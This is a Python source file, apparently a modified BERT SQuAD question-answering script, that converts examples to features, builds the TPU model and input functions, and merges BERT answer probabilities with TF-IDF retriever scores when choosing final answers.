answer = qa["answers"][0]
orig_answer_text = answer["text"]
answer_offset = answer["answer_start"]
answer_length = len(orig_answer_text)
start_position = char_to_word_offset[answer_offset]
end_position = char_to_word_offset[answer_offset + answer_length -
1]
# Only add answers where the text can be exactly recovered from the
# document. If this CAN'T happen it's likely due to weird Unicode
# stuff so we will just skip the example.
#
# Note that this means for training mode, every example is NOT
# guaranteed to be preserved.
actual_text = " ".join(
doc_tokens[start_position:(end_position + 1)])
cleaned_answer_text = " ".join(
tokenization.whitespace_tokenize(orig_answer_text))
if actual_text.find(cleaned_answer_text) == -1:
tf.logging.warning("Could not find answer: '%s' vs. '%s'",
actual_text, cleaned_answer_text)
continue
else:
start_position = -1
end_position = -1
orig_answer_text = ""
example = SquadExample(
qas_id=qas_id,
question_text=question_text,
doc_tokens=doc_tokens,
orig_answer_text=orig_answer_text,
start_position=start_position,
end_position=end_position,
is_impossible=is_impossible)
examples.append(example)
return examples
def serving_input_receiver_fn():
feature_spec = {
"unique_ids": tf.FixedLenFeature([], tf.int64),
"input_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"input_mask": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
"segment_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64),
}
serialized_tf_example = tf.placeholder(dtype=tf.string,
shape=FLAGS.predict_batch_size,
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = tf.parse_example(serialized_tf_example, feature_spec)
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
'''
# Way Original
serialized_tf_example = tf.placeholder(dtype=tf.string,
shape=[FLAGS.predict_batch_size],
name='input_example_tensor')
receiver_tensors = {'examples': serialized_tf_example}
features = tf.parse_example(serialized_tf_example, feature_spec)
return tf.estimator.export.ServingInputReceiver(features, receiver_tensors)
'''
'''
# Way1
serialized_tf_example = tf.placeholder(shape=[None], dtype=tf.string)
serialized_tf_example_1 = tf.placeholder(shape=[None], dtype=tf.string)
serialized_tf_example_2 = tf.placeholder(shape=[None], dtype=tf.string)
serialized_tf_example_3 = tf.placeholder(shape=[None], dtype=tf.string)
received_tensors = {
'unique_ids': serialized_tf_example,
'input_ids': serialized_tf_example_1,
'input_mask': serialized_tf_example_2,
'segment_ids': serialized_tf_example_3,
}
def _decode_record(record):
example = tf.parse_single_example(record, feature_spec)
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
return t
features = {}
feature_spec = { "unique_ids": tf.FixedLenFeature([], tf.int64), }
features['unique_ids'] = tf.map_fn(_decode_record, serialized_tf_example, dtype=tf.int32)
feature_spec = { "input_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64), }
features['input_ids'] = tf.map_fn(_decode_record, serialized_tf_example_1, dtype=tf.int32)
feature_spec = { "input_mask": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64), }
features['input_mask'] = tf.map_fn(_decode_record, serialized_tf_example_2, dtype=tf.int32)
feature_spec = { "segment_ids": tf.FixedLenFeature([FLAGS.max_seq_length], tf.int64), }
features['segment_ids'] = tf.map_fn(_decode_record, serialized_tf_example_3, dtype=tf.int32)
return tf.estimator.export.ServingInputReceiver(features, received_tensors)
'''
def convert_examples_to_features(examples, tokenizer, max_seq_length,
doc_stride, max_query_length, is_training,
output_fn):
"""Loads a data file into a list of `InputBatch`s."""
unique_id = 1000000000
for (example_index, example) in enumerate(examples):
query_tokens = tokenizer.tokenize(example.question_text)
if len(query_tokens) > max_query_length:
query_tokens = query_tokens[0:max_query_length]
tok_to_orig_index = []
orig_to_tok_index = []
all_doc_tokens = []
for (i, token) in enumerate(example.doc_tokens):
orig_to_tok_index.append(len(all_doc_tokens))
sub_tokens = tokenizer.tokenize(token)
for sub_token in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_token)
tok_start_position = None
tok_end_position = None
if is_training and example.is_impossible:
tok_start_position = -1
tok_end_position = -1
if is_training and not example.is_impossible:
tok_start_position = orig_to_tok_index[example.start_position]
if example.end_position < len(example.doc_tokens) - 1:
tok_end_position = orig_to_tok_index[example.end_position + 1] - 1
else:
tok_end_position = len(all_doc_tokens) - 1
(tok_start_position, tok_end_position) = _improve_answer_span(
all_doc_tokens, tok_start_position, tok_end_position, tokenizer,
example.orig_answer_text)
# The -3 accounts for [CLS], [SEP] and [SEP]
max_tokens_for_doc = max_seq_length - len(query_tokens) - 3
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = collections.namedtuple( # pylint: disable=invalid-name
"DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in query_tokens:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index,
split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
start_position = None
end_position = None
if is_training and not example.is_impossible:
# For training, if our document chunk does not contain an annotation
# we throw it out, since there is nothing to predict.
doc_start = doc_span.start
doc_end = doc_span.start + doc_span.length - 1
out_of_span = False
if not (tok_start_position >= doc_start and
tok_end_position <= doc_end):
out_of_span = True
if out_of_span:
start_position = 0
end_position = 0
else:
doc_offset = len(query_tokens) + 2
start_position = tok_start_position - doc_start + doc_offset
end_position = tok_end_position - doc_start + doc_offset
if is_training and example.is_impossible:
start_position = 0
end_position = 0
'''
if example_index < 10:
tf.compat.v1.logging.info("*** Example ***")
tf.compat.v1.logging.info("unique_id: %s" % (unique_id))
tf.compat.v1.logging.info("example_index: %s" % (example_index))
tf.compat.v1.logging.info("doc_span_index: %s" % (doc_span_index))
tf.compat.v1.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.compat.v1.logging.info("token_to_orig_map: %s" % " ".join(
["%d:%d" % (x, y) for (x, y) in six.iteritems(token_to_orig_map)]))
tf.compat.v1.logging.info("token_is_max_context: %s" % " ".join([
"%d:%s" % (x, y) for (x, y) in six.iteritems(token_is_max_context)
]))
tf.compat.v1.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.compat.v1.logging.info(
"input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.compat.v1.logging.info(
"segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
if is_training and example.is_impossible:
tf.compat.v1.logging.info("impossible example")
if is_training and not example.is_impossible:
answer_text = " ".join(tokens[start_position:(end_position + 1)])
tf.compat.v1.logging.info("start_position: %d" % (start_position))
tf.compat.v1.logging.info("end_position: %d" % (end_position))
tf.compat.v1.logging.info(
"answer: %s" % (tokenization.printable_text(answer_text)))
'''
feature = InputFeatures(
unique_id=unique_id,
example_index=example_index,
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
start_position=start_position,
end_position=end_position,
is_impossible=example.is_impossible)
# Run callback
output_fn(feature)
unique_id += 1
def _improve_answer_span(doc_tokens, input_start, input_end, tokenizer,
orig_answer_text):
"""Returns tokenized answer spans that better match the annotated answer."""
# The SQuAD annotations are character based. We first project them to
# whitespace-tokenized words. But then after WordPiece tokenization, we can
# often find a "better match". For example:
#
# Question: What year was John Smith born?
# Context: The leader was John Smith (1895-1943).
# Answer: 1895
#
# The original whitespace-tokenized answer will be "(1895-1943).". However
# after tokenization, our tokens will be "( 1895 - 1943 ) .". So we can match
# the exact answer, 1895.
#
# However, this is not always possible. Consider the following:
#
# Question: What country is the top exporter of electornics?
# Context: The Japanese electronics industry is the lagest in the world.
# Answer: Japan
#
# In this case, the annotator chose "Japan" as a character sub-span of
# the word "Japanese". Since our WordPiece tokenizer does not split
# "Japanese", we just use "Japanese" as the annotation. This is fairly rare
# in SQuAD, but does happen.
tok_answer_text = " ".join(tokenizer.tokenize(orig_answer_text))
for new_start in range(input_start, input_end + 1):
for new_end in range(input_end, new_start - 1, -1):
text_span = " ".join(doc_tokens[new_start:(new_end + 1)])
if text_span == tok_answer_text:
return (new_start, new_end)
return (input_start, input_end)
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
use_one_hot_embeddings):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
final_hidden = model.get_sequence_output()
final_hidden_shape = modeling.get_shape_list(final_hidden, expected_rank=3)
batch_size = final_hidden_shape[0]
seq_length = final_hidden_shape[1]
hidden_size = final_hidden_shape[2]
output_weights = tf.get_variable(
"cls/squad/output_weights", [2, hidden_size],
initializer=tf.truncated_normal_initializer(stddev=0.02))
output_bias = tf.get_variable(
"cls/squad/output_bias", [2], initializer=tf.zeros_initializer())
final_hidden_matrix = tf.reshape(final_hidden,
[batch_size * seq_length, hidden_size])
logits = tf.matmul(final_hidden_matrix, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
logits = tf.reshape(logits, [batch_size, seq_length, 2])
logits = tf.transpose(logits, [2, 0, 1])
unstacked_logits = tf.unstack(logits, axis=0)
(start_logits, end_logits) = (unstacked_logits[0], unstacked_logits[1])
return (start_logits, end_logits)
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps, use_tpu,
use_one_hot_embeddings):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
if FollowInitTPU == 1 :
print('model_fn_builder Start')
#unique_ids = features["unique_ids"]
unique_ids = features["label_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
(start_logits, end_logits) = create_model(
bert_config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
tvars = tf.trainable_variables()
initialized_variable_names = {}
scaffold_fn = None
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
if use_tpu:
def tpu_scaffold():
if FollowInitTPU:
print('Start in the def tpu_scaffold()')
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
if FollowInitTPU:
print('End in the def tpu_scaffold()')
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
seq_length = modeling.get_shape_list(input_ids)[1]
def compute_loss(logits, positions):
one_hot_positions = tf.one_hot(
positions, depth=seq_length, dtype=tf.float32)
log_probs = tf.nn.log_softmax(logits, axis=-1)
loss = -tf.reduce_mean(
tf.reduce_sum(one_hot_positions * log_probs, axis=-1))
return loss
start_positions = features["start_positions"]
end_positions = features["end_positions"]
start_loss = compute_loss(start_logits, start_positions)
end_loss = compute_loss(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2.0
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, use_tpu)
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op,
scaffold_fn=scaffold_fn)
elif mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
"unique_ids": unique_ids,
"start_logits": start_logits,
"end_logits": end_logits,
}
print("Start in the TPUEstimatorSpec")
output_spec = tf.contrib.tpu.TPUEstimatorSpec(
mode=mode, predictions=predictions, scaffold_fn=scaffold_fn)
print("End in the TPUEstimatorSpec")
else:
raise ValueError(
"Only TRAIN and PREDICT modes are supported: %s" % (mode))
if FollowInitTPU == 1 :
print('model_fn_builder End')
return output_spec
return model_fn
def input_fn_builder(input_file, seq_length, is_training, drop_remainder):
"""Creates an `input_fn` closure to be passed to TPUEstimator."""
if FollowInitTPU == 1:
print ('Start in input_fn_builder')
name_to_features = {
"unique_ids": tf.io.FixedLenFeature([], tf.int64),
"input_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
"input_mask": tf.io.FixedLenFeature([seq_length], tf.int64),
"segment_ids": tf.io.FixedLenFeature([seq_length], tf.int64),
}
if is_training:
name_to_features["start_positions"] = tf.io.FixedLenFeature([], tf.int64)
name_to_features["end_positions"] = tf.io.FixedLenFeature([], tf.int64)
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
if FollowInitTPU == 1:
print ('Start in _decode_record')
example = tf.parse_single_example(record, name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.to_int32(t)
example[name] = t
if FollowInitTPU == 1:
print ('End in _decode_record')
return example
def input_fn(params):
"""The actual input function."""
if FollowInitTPU == 1:
print ('Start in input_fn')
batch_size = params["batch_size"]
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
d = tf.data.TFRecordDataset(input_file)
if is_training:
d = d.repeat()
d = d.shuffle(buffer_size=100)
d = d.apply(
tf.data.experimental.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
drop_remainder=drop_remainder))
if FollowInitTPU == 1:
print ('End in input_fn')
return d
if FollowInitTPU == 1:
print ('End in .')
return input_fn
def RepresentsInt(s):
try:
int(s)
return True
except ValueError:
return False
RawResult = collections.namedtuple("RawResult",
["unique_id", "start_logits", "end_logits"])
def write_predictions(all_examples, all_features, all_results, n_best_size,
max_answer_length, do_lower_case
):
"""Write final predictions to the json file and log-odds of null if needed."""
global ranker
'''
tf.compat.v1.logging.info("Writing predictions to: %s" % (output_prediction_file))
tf.compat.v1.logging.info("Writing nbest to: %s" % (output_nbest_file))
tf.compat.v1.logging.info("Writing Aten predic to: %s" % (output_Aten_predict_file))
'''
ans_list = []
text_list = []
example_index_to_features = collections.defaultdict(list)
for feature in all_features:
example_index_to_features[feature.example_index].append(feature)
unique_id_to_result = {}
#tf.compat.v1.logging.info("length of all_results: %d" % (len(all_results)))
for result in all_results:
unique_id_to_result[result.unique_id] = result
_PrelimPrediction = collections.namedtuple( # pylint: disable=invalid-name
"PrelimPrediction",
["feature_index", "start_index", "end_index", "start_logit", "end_logit"])
# Willy Addd collections -> for results
#-------------------------------------------------------------------------------
_AllPredictions = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictions",
["question", "PredictListOneQues"])
_AllPredictResultsInOneQuestion = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictResultsInOneQuestion",
["doc_text", "doc_id", "doc_score", "PredictListOneDoc"])
_AllPredictResultsInOneDocument = collections.namedtuple( # pylint: disable=invalid-name
"AllPredictResultsInOneDocument",
["answer", "prob", "start", "end"])
_FinalResult = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult",
["question", "text", "text_id", "ans", "prob"])
_FinalResult2 = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult2",
["question", "text", "ans", "prob"])
_FinalResult3 = collections.namedtuple( # pylint: disable=invalid-name
"FinalResult3",
["question", "text", "ans", "ans_prob", "TFIDF", "Score", "choice"])
_FinalResultAll = collections.namedtuple( # pylint: disable=invalid-name
"FinalResultAll",
["question", "text1", "ans1", "ans_prob1", "TFIDF1", "Score1", "text2", "ans2", "ans_prob2", "TFIDF2", "Score2", "choice"])
_TempAllpredict_Layer1 = collections.namedtuple( # pylint: disable=invalid-name
"TempAllpredict_Layer1",
["question" , "TempAllpredictList_Layer2"])
_TempAllpredict_Layer2 = collections.namedtuple( # pylint: disable=invalid-name
"TempAllpredict_Layer2",
["doc_id","doc_text","best_ans","best_prob"])
#-------------------------------------------------------------------------------
all_predictions = collections.OrderedDict()
all_nbest_json = collections.OrderedDict()
scores_diff_json = collections.OrderedDict()
all_predicts = []
all_predictsInOneQues = []
quesList = []
Aten_result_list = []
Aten_result3_list = []
TempAllpredictLayer1_list = []
TempAllpredictLayer2_list = []
best_answer=""
best_prob=0.0
ans_is_null = True
#ranker = retriever.get_class('tfidf')(tfidf_path=FLAGS.retriever_model)
for (example_index, example) in enumerate(all_examples):
features = example_index_to_features[example_index]
if example_in_write_predictions == 1:
print ("example idx:%d" %example_index)
print("question in example from predict")
print(example.question_text)
print("doc_tokens in example from predict")
print(example.doc_tokens)
print('-'*60)
print('\n')
doc_names = []
doc_scores = []
try:
doc_names, doc_scores = ranker.closest_docs( example.question_text, 10 )
except:
doc_names.append('None')
doc_scores.append(0)
prelim_predictions = []
# keep track of the minimum score of null start+end of position 0
score_null = 1000000 # large and positive
min_null_feature_index = 0 # the paragraph slice with min mull score
null_start_logit = 0 # the start logit at the slice with min null score
null_end_logit = 0 # the end logit at the slice with min null score
for (feature_index, feature) in enumerate(features):
result = unique_id_to_result[feature.unique_id]
start_indexes = _get_best_indexes(result.start_logits, n_best_size)
end_indexes = _get_best_indexes(result.end_logits, n_best_size)
# if we could have irrelevant answers, get the min score of irrelevant
if FLAGS.version_2_with_negative:
feature_null_score = result.start_logits[0] + result.end_logits[0]
if feature_null_score < score_null:
score_null = feature_null_score
min_null_feature_index = feature_index
null_start_logit = result.start_logits[0]
null_end_logit = result.end_logits[0]
for start_index in start_indexes:
for end_index in end_indexes:
# We could hypothetically create invalid predictions, e.g., predict
# that the start of the span is in the question. We throw out all
# invalid predictions.
if start_index >= len(feature.tokens):
continue
if end_index >= len(feature.tokens):
continue
if start_index not in feature.token_to_orig_map:
continue
if end_index not in feature.token_to_orig_map:
continue
if not feature.token_is_max_context.get(start_index, False):
continue
if end_index < start_index:
continue
length = end_index - start_index + 1
if length > max_answer_length:
continue
prelim_predictions.append(
_PrelimPrediction(
feature_index=feature_index,
start_index=start_index,
end_index=end_index,
start_logit=result.start_logits[start_index],
end_logit=result.end_logits[end_index]))
if FLAGS.version_2_with_negative:
prelim_predictions.append(
_PrelimPrediction(
feature_index=min_null_feature_index,
start_index=0,
end_index=0,
start_logit=null_start_logit,
end_logit=null_end_logit))
prelim_predictions = sorted(
prelim_predictions,
key=lambda x: (x.start_logit + x.end_logit),
reverse=True)
_NbestPrediction = collections.namedtuple( # pylint: disable=invalid-name
"NbestPrediction", ["text", "start_logit", "end_logit"])
seen_predictions = {}
nbest = []
for pred in prelim_predictions:
if len(nbest) >= n_best_size:
break
feature = features[pred.feature_index]
if pred.start_index > 0: # this is a non-null prediction
tok_tokens = feature.tokens[pred.start_index:(pred.end_index + 1)]
orig_doc_start = feature.token_to_orig_map[pred.start_index]
orig_doc_end = feature.token_to_orig_map[pred.end_index]
orig_tokens = example.doc_tokens[orig_doc_start:(orig_doc_end + 1)]
tok_text = " ".join(tok_tokens)
# De-tokenize WordPieces that have been split off.
tok_text = tok_text.replace(" ##", "")
tok_text = tok_text.replace("##", "")
# Clean whitespace
tok_text = tok_text.strip()
tok_text = " ".join(tok_text.split())
orig_text = " ".join(orig_tokens)
final_text = get_final_text(tok_text, orig_text, do_lower_case)
if final_text in seen_predictions:
continue
seen_predictions[final_text] = True
else:
final_text = ""
seen_predictions[final_text] = True
nbest.append(
_NbestPrediction(
text=final_text,
start_logit=pred.start_logit,
end_logit=pred.end_logit))
# if we didn't inlude the empty option in the n-best, inlcude it
if FLAGS.version_2_with_negative:
if "" not in seen_predictions:
nbest.append(
_NbestPrediction(
text="", start_logit=null_start_logit,
end_logit=null_end_logit))
# In very rare edge cases we could have no valid predictions. So we
# just create a nonce prediction in this case to avoid failure.
if not nbest:
nbest.append(
_NbestPrediction(text="empty", start_logit=0.0, end_logit=0.0))
assert len(nbest) >= 1
total_scores = []
best_non_null_entry = None
for entry in nbest:
total_scores.append(entry.start_logit + entry.end_logit)
if not best_non_null_entry:
if entry.text:
best_non_null_entry = entry
#參考
probs = _compute_softmax(total_scores)
nbest_json = []
for i, entry in enumerate(nbest):
output = collections.OrderedDict()
output["text"] = entry.text
output["probability"] = probs[i]
output["start_logit"] = entry.start_logit
output["end_logit"] = entry.end_logit
nbest_json.append(output)
#----------------------------------------------
# presupposition : Question is in order
#"question", "PredictResults"
if example.question_text not in quesList :
if len(quesList)!=0 :
#1. Save to all predicts
#print('all_predictsInOneQues-')
#print(all_predictsInOneQues)
temp = copy.deepcopy(all_predictsInOneQues)
#print('temp')
#print(temp)
all_predicts.append(
_AllPredictions(
question=quesList[-1],
PredictListOneQues=temp
)
)
#2.TODO : Find the result (move to outside)
#3. reset all_predictsInOneQues
all_predictsInOneQues.clear()
#. Add to questList
quesList.append(example.question_text)
#----------------------------------------------
# save answer dataset
#----------------------------------------------
all_predictsInOneDoc = []
#print('go to (1)')
for i, entry in enumerate(nbest):
tp_answer = entry.text
#print('ids:%d:%s' %(i,tp_answer))
for i, entry in enumerate(nbest):
tp_answer = entry.text
if len(all_predictsInOneDoc) != 0:
break
temp = tp_answer.replace(" ", "")
if not temp:
continue
if len(tp_answer) < 3:
if not RepresentsInt(tp_answer):
continue
all_predictsInOneDoc.append(
_AllPredictResultsInOneDocument(
answer=entry.text,
prob=Decimal(probs[i]),
start=entry.start_logit,
end=entry.end_logit
)
)
if len(all_predictsInOneDoc) == 0:
for i, entry in enumerate(nbest):
if predict_result_index == 1:
print(entry)
if i == 2:
if predict_result_index == 1:
print('In state 2')
break
tp_answer = entry.text
if i == 0:
if tp_answer.isspace() or not tp_answer:
if predict_result_index == 1:
print('In state 0,tp_ans: %s' % tp_answer)
continue
if i == 1 and len(all_predictsInOneDoc) != 0:
if predict_result_index == 1:
print('In state 1,tp_ans: %s' % tp_answer)
break
if predict_result_index == 1:
print('In state set pridict. tp_ans: %s' % tp_answer)
all_predictsInOneDoc.append(
_AllPredictResultsInOneDocument(
answer=entry.text,
prob=Decimal(probs[i]),
start=entry.start_logit,
end=entry.end_logit
)
)
nbest.clear()
#print('go to (2)')
#----------------------------------------------
# End of save answer dataset
if predict_result_index == 1:
for i, entry in enumerate(all_predictsInOneDoc):
print('index:%d' %i)
print("answer: %s" %(entry.answer))
print("prob: %s" %(entry.prob))
print("start: %s" %(entry.start))
print("end: %s" %(entry.end))
print('\n')
print('-'*15)
print('\n')
#----------------------------------------------
tp_docscore = 0.0
if example.doc_id in doc_names :
tp_docindex = doc_names.index(example.doc_id)
tp_docscore = doc_scores [tp_docindex]
#print('go to (4)')
#print('go to (5)')
#print('all_predictsInOneQues-in set')
#print(all_predictsInOneQues)
all_predictsInOneQues.append(
_AllPredictResultsInOneQuestion(
doc_text=example.doc_tokens,
doc_id=example.doc_id,
doc_score=tp_docscore,
PredictListOneDoc=all_predictsInOneDoc
)
)
#----------------------------------------------
# if example is examples last data
if example == all_examples[-1] :
all_predicts.append(
_AllPredictions(question=example.question_text,PredictListOneQues=all_predictsInOneQues))
#----------------------------------------------
assert len(nbest_json) >= 1
if not FLAGS.version_2_with_negative:
all_predictions[example.qas_id] = nbest_json[0]["text"]
else:
# predict "" iff the null score - the score of best non-null > threshold
if best_non_null_entry == None :
score_diff = FLAGS.null_score_diff_threshold + 1.0
else:
score_diff = score_null - best_non_null_entry.start_logit - (
best_non_null_entry.end_logit)
scores_diff_json[example.qas_id] = score_diff
if score_diff > FLAGS.null_score_diff_threshold:
all_predictions[example.qas_id] = ""
else:
all_predictions[example.qas_id] = best_non_null_entry.text
all_nbest_json[example.qas_id] = nbest_json
# Find the best answer from Aten collections
#----------------------------------------------
retriever_weight = FLAGS.retriever_weight
for i, entry_predicts in enumerate(all_predicts):
tp_ques = entry_predicts.question
QuesList = entry_predicts.PredictListOneQues
#print("ques: %s" %(tp_ques))
# set score only with bert , TF-IDF used to be choice doc.
#----------------------------------------------
QuesList.sort(key=TakeThird, reverse=True)
#print('len with QuesList:%d' %len(QuesList))
tp_text1 = QuesList[0].doc_text
text1=""
for word in tp_text1:
text1= text1 + " " + word
ans1=""
ans1_prob = 0.0
TFIDF1 = QuesList[0].doc_score
Score1 = 0.0
entry_OneDoc = QuesList [0].PredictListOneDoc
if len(entry_OneDoc) != 0 :
ans1 = entry_OneDoc[0].answer
ans1_prob = entry_OneDoc[0].prob
for k, entry_OneAns in enumerate(entry_OneDoc):
#print('index:%d' %k)
tp_ans1_prob = Decimal(entry_OneAns.prob)
if tp_ans1_prob > ans1_prob:
ans1_prob = tp_ans1_prob
ans1 = entry_OneAns.answer
#print('Ans_ans:%s' %(entry_OneAns.answer))
#print('Ans_prob:%e , start:%e , end:%e' %(entry_OneAns.prob , entry_OneAns.start , entry_OneAns.end))
Score1 = ans1_prob
#----------------------------------------------
# set score with bert and TF-IDF
#----------------------------------------------
text2=""
ans2=""
ans2_prob = 0.0
TFIDF2 = 0.0
Score2 = 0.0
for j , entry_OneDoc in enumerate(QuesList):
tp_TFIDF2 = entry_OneDoc.doc_score
tp_text2=""
for word in entry_OneDoc.doc_text:
tp_text2 = tp_text2 + " " + word
DocList = []
DocList = entry_OneDoc.PredictListOneDoc
for k, entry_OneAns in enumerate(DocList):
tp_ans2_prob = Decimal(entry_OneAns.prob)
tp_Score2 = Decimal(retriever_weight)*Decimal(tp_TFIDF2) + Decimal(1.0-retriever_weight)*Decimal(tp_ans2_prob)
if tp_Score2>Score2:
text2=tp_text2
ans2=entry_OneAns.answer
ans2_prob=tp_ans2_prob
TFIDF2=tp_TFIDF2
Score2 =tp_Score2
#----------------------------------------------
fin_text = text1
fin_ans = ans1
fin_ans_prob = ans1_prob
fin_TFIDF = TFIDF1
fin_Score = Score1
choice_value = 0
if TFIDF1<FLAGS.choice_score:
print("Answer2 State1")
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
elif ans2_prob>ans1_prob*2 and ans2_prob > FLAGS.threshold_prob_ans_merge:
print("Answer2 State2")
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
else:
use_ans2 = False
if len(ans1)<3:
print("Answer2 State3,len=%d" %len(ans1))
use_ans2 = True
else:
for char in ans1:
print("Answer2 State4")
if char<' ' or char>'~' :
print(ord(ch))
use_ans2 = True
break
if use_ans2 == True :
fin_text = text2
fin_ans = ans2
fin_ans_prob = ans2_prob
fin_TFIDF = TFIDF2
fin_Score = Score2
choice_value = 1
else:
print("Answer1 State1")
ans_list.append(fin_ans)
text_list.append(fin_text)
if FLAGS.show_all_choice == 0:
Aten_result3_list.append(
_FinalResult3(
question = tp_ques,
text = fin_text,
ans = fin_ans,
ans_prob = fin_ans_prob,
TFIDF = fin_TFIDF,
Score = fin_Score,
choice = choice_value
)
)
else :
Aten_result3_list.append(
_FinalResultAll(
question = tp_ques,
text1 = text1,
ans1 = ans1,
ans_prob1 = ans1_prob,
TFIDF1 = TFIDF1,
Score1 = Score1,
text2 = text2,
ans2 = ans2,
ans_prob2 = ans2_prob,
TFIDF2 = TFIDF2,
Score2 = Score2,
choice = choice_value
)
)
print('ques: %s' %tp_ques)
if FLAGS.show_all_choice==1:
print('-'*5)
print('Only Bert (TF-IDF used to be choice document):')
print('text: %s' %text1)
print('ans: %s' %ans1)
print('Show ans1:')
print('ans_prob: %s' %ans1_prob)
print('TFIDF: %s' %TFIDF1)
print('Score: %s' %Score1)
print('')
print('-'*5)
print('Merge TF-IDF:')
print('text: %s' %text2)
print('ans: %s' %ans2)
print('ans_prob: %s' %ans2_prob)
print('TFIDF: %s' %TFIDF2)
print('Score: %s' %Score2)
print('-'*5)
print('My Choice ans(%d):' %choice_value)
print('text: %s' %fin_text)
print('ans: %s' %fin_ans)
print('ans_prob: %s' %fin_ans_prob)
print('TFIDF: %s' %fin_TFIDF)
